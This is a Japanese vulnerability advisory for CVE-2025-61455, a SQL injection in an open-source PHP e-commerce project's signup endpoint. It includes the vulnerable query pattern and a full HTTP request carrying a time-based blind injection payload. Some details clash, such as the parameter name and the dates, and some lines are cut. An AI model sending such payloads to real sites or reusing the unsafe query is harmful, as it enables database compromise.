開示日: 2025年10月14日
CVE ID: CVE-2025-61455
深刻度: CRITICAL (CVSS 9.8)
E-commerce Project v1.0 の signup.inc.php エンドポイントに、重大なSQLインジェクションの脆弱性が存在します。このアプリケーションは、サニタイズされていないユーザー入力をSQLクエリに直接組み込んでおり、認証されていない攻撃者が認証をバイパスし、任意のSQLコマンドを実行できる可能性があります。
この問題には識別子 CVE-2025-61455 が割り当てられています。公開時点では、公式パッチは提供されていません。
signup.inc.phphttps://localhost/e-commerce-main/includes/signup.inc.phpこのアプリケーションは、入力検証やプリペアドステートメントを使用せずに、サニタイズされていない入力をSQLクエリに直接使用しています。この脆弱性は、signup.inc.php ファイルの aid パラメータに存在します。
攻撃者は、emailパラメータを通じて悪意のあるSQLコードを注入し、時間ベースのブラインドSQLインジェクション攻撃を実行できます。
脆弱なコードパターンの例:
$query = "SELECT * FROM table WHERE email='$email'";
これにより、クエリロジックを操作し、機密データを抽出できるインジェクションペイロードが可能になります。
| CWE ID | タイトル |
|---|---|
| CWE-89 | SQLコマンドで使用される特殊要素の不適切な無効化 |
| スコア | 深刻度 | ベクター文字列 |
|---|---|---|
| 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
悪用に成功した場合、以下の結果が生じる可能性があります:
git clone https://github.com/Bhabishya-123/E-commerce.git
XAMPP/LAMPを使用してプロジェクトをデプロイし、以下のURLにアクセスします:
http://localhost/e-commerce-main/includes/signup.inc.php
以下の悪意のあるHTTPリクエストを送信します:
POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=
説明:
emailパラメータには、時間ベースのSQLインジェクションペイロードが含まれています: '+(select*from(select(sleep(20)))a)+'
アプリケーションが応答するまでに20秒の遅延が発生した場合、SQLインジェクションは成功しています。
mysqli_prepare() または PDO) に置き換える。| イベント | 日付 |
|---|---|
| 脆弱性の発見 | 2025年9月16日 |
| 公開開示 | 2025年10月13日 |
| パッチの提供 | ❌ 開示時点では利用不可 |
この脆弱性は、以下の人物によって発見され、責任を持って開示されました:
Tansique Dasari
🔗 GitHub
✉️ [email protected]
💬 このアドバイザリは、ベンダーからの応答がないため、独立して公開されています。